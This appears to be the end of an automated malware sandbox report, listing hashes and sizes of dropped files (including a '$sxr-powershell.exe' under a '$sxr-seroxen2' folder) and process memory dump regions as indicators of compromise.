                                                                                                              a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                              SHA512

                                                                                                              2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                            • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                              Filesize

                                                                                                              409KB

                                                                                                              MD5

                                                                                                              7417c8c73e614f293152575f46134216

                                                                                                              SHA1

                                                                                                              cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805

                                                                                                              SHA256

                                                                                                              00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

                                                                                                              SHA512

                                                                                                              897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0

                                                                                                            • C:\Windows\Temp\__PSScriptPolicyTest_gejrha1l.a3z.ps1
                                                                                                              Filesize

                                                                                                              1B

                                                                                                              MD5

                                                                                                              c4ca4238a0b923820dcc509a6f75849b

                                                                                                              SHA1

                                                                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                              SHA256

                                                                                                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                              SHA512

                                                                                                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                                              Filesize

                                                                                                              412B

                                                                                                              MD5

                                                                                                              8af28da34f963901dbe719f6b73a4a4f

                                                                                                              SHA1

                                                                                                              5ca890657e6c113120432c77e4747a38cd1d6321

                                                                                                              SHA256

                                                                                                              c4534eef4b11858e01add1166d448abf619936548f8aa4627a7968da7ada7ba9

                                                                                                              SHA512

                                                                                                              b512b243e88a8849caff65e6adc9b0772c65b87c81434e048594e7f871b1facc333dbf037577bfd8c9aa0a6145c62fc081253867d14cc7ce99745065c71043fd

                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                              Filesize

                                                                                                              3KB

                                                                                                              MD5

                                                                                                              56efdb5a0f10b5eece165de4f8c9d799

                                                                                                              SHA1

                                                                                                              fa5de7ca343b018c3bfeab692545eb544c244e16

                                                                                                              SHA256

                                                                                                              6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

                                                                                                              SHA512

                                                                                                              91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Filesize

                                                                                                              1KB

                                                                                                              MD5

                                                                                                              efe0903424c927d3611f8d8acd078b79

                                                                                                              SHA1

                                                                                                              22fda4e644f8fa0908493f40b930b1dff1755356

                                                                                                              SHA256

                                                                                                              79fc6c6c41514007fa27978e5313312789718489126594f603a4a325153114d6

                                                                                                              SHA512

                                                                                                              8de645327a416095eae442471a8b4f0b27c60dd424545ebb9f9708a412b6f7d0635ef3069e1663db3dd2bfe5882040c25a1af10d12a2eed4bf8340fd401f8de9

                                                                                                            • memory/584-91-0x0000027952490000-0x00000279524BB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-97-0x0000027952490000-0x00000279524BB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-90-0x0000027952490000-0x00000279524BB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/584-89-0x0000027952460000-0x0000027952485000-memory.dmp
                                                                                                              Filesize

                                                                                                              148KB

                                                                                                            • memory/584-98-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/640-109-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/640-102-0x000001F427F30000-0x000001F427F5B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/640-108-0x000001F427F30000-0x000001F427F5B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/740-119-0x000001F987C50000-0x000001F987C7B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/740-120-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/740-113-0x000001F987C50000-0x000001F987C7B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/900-124-0x000002A27F080000-0x000002A27F0AB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/900-131-0x00007FFA7E860000-0x00007FFA7E870000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/900-130-0x000002A27F080000-0x000002A27F0AB000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/1008-135-0x000002C8B5270000-0x000002C8B529B000-memory.dmp
                                                                                                              Filesize

                                                                                                              172KB

                                                                                                            • memory/2256-73-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2256-86-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2256-74-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2256-78-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2256-82-0x00007FFABE7D0000-0x00007FFABE9AB000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/2256-83-0x00007FFABCA90000-0x00007FFABCB3E000-memory.dmp
                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/2256-75-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2256-76-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/3660-6-0x0000000005670000-0x0000000005682000-memory.dmp
                                                                                                              Filesize

                                                                                                              72KB

                                                                                                            • memory/3660-7-0x0000000005A60000-0x0000000005A9E000-memory.dmp
                                                                                                              Filesize

                                                                                                              248KB

                                                                                                            • memory/3660-1-0x0000000000130000-0x000000000019C000-memory.dmp
                                                                                                              Filesize

                                                                                                              432KB

                                                                                                            • memory/3660-2-0x0000000004EF0000-0x00000000053EE000-memory.dmp
                                                                                                              Filesize

                                                                                                              5.0MB

                                                                                                            • memory/3660-3-0x0000000004A90000-0x0000000004B22000-memory.dmp
                                                                                                              Filesize

                                                                                                              584KB

                                                                                                            • memory/3660-4-0x0000000073AA0000-0x000000007418E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/3660-5-0x0000000004B30000-0x0000000004B96000-memory.dmp
                                                                                                              Filesize

                                                                                                              408KB

                                                                                                            • memory/3660-20-0x0000000073AA0000-0x000000007418E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/3660-0-0x0000000073AAE000-0x0000000073AAF000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/4240-14-0x0000000073AA0000-0x000000007418E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4240-13-0x0000000073AA0000-0x000000007418E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4240-46-0x0000000006820000-0x000000000682A000-memory.dmp
                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/4240-1280-0x0000000073AA0000-0x000000007418E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4240-1281-0x0000000073AA0000-0x000000007418E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4384-71-0x00007FFABE7D0000-0x00007FFABE9AB000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/4384-72-0x00007FFABCA90000-0x00007FFABCB3E000-memory.dmp
                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/4384-25-0x000002B3F51C0000-0x000002B3F51E2000-memory.dmp
                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/4384-28-0x000002B3F54E0000-0x000002B3F5556000-memory.dmp
                                                                                                              Filesize

                                                                                                              472KB

                                                                                                            • memory/4384-70-0x000002B3F5460000-0x000002B3F548A000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB